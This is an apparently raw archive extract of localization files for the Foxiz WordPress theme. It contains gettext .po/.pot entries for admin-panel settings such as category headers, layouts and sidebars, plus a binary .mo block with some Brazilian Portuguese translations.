backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK!- languages/pt_BR.monu[/     % /9@IR Wb is|O  .8AHPclt{"\)19>Q e p }  ]m }    b t            6 )C m t }y     8 B K U ^ g n %u %s Comments%s comments1 Comment1 commentAcceptArticlesCommentsEditFind More:FollowFollow USFollow: Have an existing account?Hi,It seems we can’t find what you’re looking for. Perhaps searching can help.Leave a commentLost your password?More ResultsOops! Nothing hereRead MoreReading:RemoveResizerReturn to HomepageSOURCES:Save itSearchSearch Results for: %sShareShowing %s results for your searchSign InSign OutSorry, but nothing matched your search terms. Please try again with some different keywords.TAGGED:UpdatedVIA:What do you think?You Might Also LikeYour EmailYour WebsiteYour emailYour nameYour websiteeditsearchupdate (Last Updated)Project-Id-Version: Foxiz POT-Creation-Date: 2022-05-18 13:30+0700 PO-Revision-Date: 2022-09-02 00:01+0000 Last-Translator: Language-Team: Português do Brasil Language: pt_BR MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Generator: Loco https://localise.biz/ X-Poedit-Basepath: .. Plural-Forms: nplurals=2; plural=n != 1; X-Poedit-SourceCharset: UTF-8 X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;_n_noop X-Poedit-SearchPath-0: . X-Poedit-SearchPathExcluded-0: *.js Report-Msgid-Bugs-To: X-Loco-Version: 2.6.2; wp-6.0.2%s Comentários%s comentários1 Comentário1 comentárioAceitarPostagensComentáriosEditarEncontrar maisSeguirNos siga nas redes sociaisSeguir:Já tem uma conta?Olá,Parece que não conseguimos encontrar o que você está procurando. Talvez pesquisar possa ajudar.Deixe um comentárioEsqueceu sua senha?Mais resultadosOps! Nada aquiLeia maisLeitura:RemoverRedimensionadorVoltar a página inicialFontes:Salve issoBuscarResultados da busca por: %sCompartilharMostrando %s resultados para sua pesquisaEntrarSairDesculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente novamente com algumas palavras-chave diferentes.TagsAtualizadoVia:O que você acha?Você pode gostar tambémSeu emailSeu siteSeu emailSeu nomeSeu siteeditarbuscaratualização (última atualização)PK!g ||languages/foxiz.potnu[#, fuzzy msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2017-07-16 09:08+0700\n" "Last-Translator: \n" "Language-Team: Theme-Ruby \n" "Language: en\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Poedit 2.4.2\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=(n != 1);\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;esc_attr_e;" "foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options > Category" "\"." msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "Select a highlight color for the entry category to display in the post listing." msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in the dark " "mode." msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for this " "category. Leave blank to use the above setting." msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 backend/configs.php:71 #: backend/configs.php:106 backend/configs.php:161 backend/configs.php:195 #: backend/configs.php:209 backend/configs.php:236 backend/configs.php:288 #: backend/configs.php:319 backend/configs.php:357 backend/configs.php:373 #: backend/configs.php:424 backend/configs.php:499 backend/configs.php:524 #: backend/configs.php:542 backend/configs.php:559 backend/configs.php:583 #: backend/configs.php:607 backend/configs.php:634 backend/configs.php:693 #: backend/configs.php:732 backend/configs.php:771 backend/configs.php:801 #: backend/configs.php:822 backend/mega-menu.php:139 backend/mega-menu.php:150 #: backend/panels/blog-pages.php:324 backend/panels/blog-pages.php:493 #: backend/panels/blog-pages.php:523 backend/panels/blog-pages.php:811 #: backend/panels/blog-pages.php:980 backend/panels/blog-pages.php:1010 #: backend/panels/blog-pages.php:1394 backend/panels/blog-pages.php:1424 #: backend/panels/blog-pages.php:1633 backend/panels/blog-pages.php:1802 #: backend/panels/blog-pages.php:1832 backend/panels/blog-pages.php:2125 #: backend/panels/blog-pages.php:2294 backend/panels/blog-pages.php:2324 #: backend/panels/bookmark.php:227 backend/panels/bookmark.php:392 #: backend/panels/bookmark.php:414 backend/panels/bookmark.php:675 #: backend/panels/bookmark.php:840 backend/panels/bookmark.php:870 #: backend/panels/design.php:578 backend/panels/design.php:595 #: backend/single-metaboxes.php:60 backend/single-metaboxes.php:73 #: backend/single-metaboxes.php:132 backend/single-metaboxes.php:223 #: backend/single-metaboxes.php:360 backend/single-metaboxes.php:408 #: backend/single-metaboxes.php:487 backend/single-metaboxes.php:507 #: backend/single-metaboxes.php:652 backend/single-metaboxes.php:714 #: backend/single-metaboxes.php:726 backend/single-metaboxes.php:824 #: backend/single-metaboxes.php:843 backend/single-metaboxes.php:862 #: backend/single-metaboxes.php:874 backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 backend/panels/blog-pages.php:326 #: backend/panels/blog-pages.php:497 backend/panels/blog-pages.php:527 #: backend/panels/blog-pages.php:813 backend/panels/blog-pages.php:984 #: backend/panels/blog-pages.php:1014 backend/panels/blog-pages.php:1227 #: backend/panels/blog-pages.php:1398 backend/panels/blog-pages.php:1428 #: backend/panels/blog-pages.php:1635 backend/panels/blog-pages.php:1806 #: backend/panels/blog-pages.php:1836 backend/panels/blog-pages.php:2127 #: backend/panels/blog-pages.php:2298 backend/panels/blog-pages.php:2328 #: backend/panels/bookmark.php:229 backend/panels/bookmark.php:396 #: backend/panels/bookmark.php:415 backend/panels/bookmark.php:677 #: backend/panels/bookmark.php:844 backend/panels/bookmark.php:871 #: backend/panels/breadcrumb.php:55 backend/panels/breadcrumb.php:66 #: backend/panels/breadcrumb.php:77 backend/panels/breadcrumb.php:88 #: backend/panels/breadcrumb.php:99 backend/panels/footer.php:99 #: backend/panels/page.php:87 backend/panels/single-post.php:239 #: backend/panels/single-post.php:454 backend/panels/single-post.php:1181 #: backend/panels/single-post.php:1223 backend/single-metaboxes.php:147 #: backend/single-metaboxes.php:159 backend/single-metaboxes.php:362 #: backend/single-metaboxes.php:410 backend/single-metaboxes.php:488 #: backend/single-metaboxes.php:653 backend/single-metaboxes.php:686 #: backend/single-metaboxes.php:697 backend/single-metaboxes.php:716 #: backend/single-metaboxes.php:826 backend/single-metaboxes.php:845 #: backend/single-metaboxes.php:864 backend/single-metaboxes.php:875 #: backend/single-metaboxes.php:924 backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 backend/panels/page.php:86 #: backend/panels/single-post.php:238 backend/panels/single-post.php:453 #: backend/panels/single-post.php:1179 backend/single-metaboxes.php:158 #: backend/single-metaboxes.php:361 backend/single-metaboxes.php:409 #: backend/single-metaboxes.php:477 backend/single-metaboxes.php:616 #: backend/single-metaboxes.php:654 backend/single-metaboxes.php:685 #: backend/single-metaboxes.php:696 backend/single-metaboxes.php:715 #: backend/single-metaboxes.php:825 backend/single-metaboxes.php:844 #: backend/single-metaboxes.php:863 backend/single-metaboxes.php:876 #: backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, ie: " "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing for this " "category." msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the default." msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/category-settings.php:183 msgid "Input a heading for the post listing. Leave this option blank to set the default." msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "Select a HTML tag for this heading. Leave this option blank to set the default." msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave this option " "blank to set the default value." msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: tagslug1," "tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the desktop device." msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the tablet device." msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the mobile device." msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is enabled." msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:329 msgid "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would like. For " "example: 50" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date). All " "meta keys include: [author, date, category, tag, view, comment, update, read, custom]" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 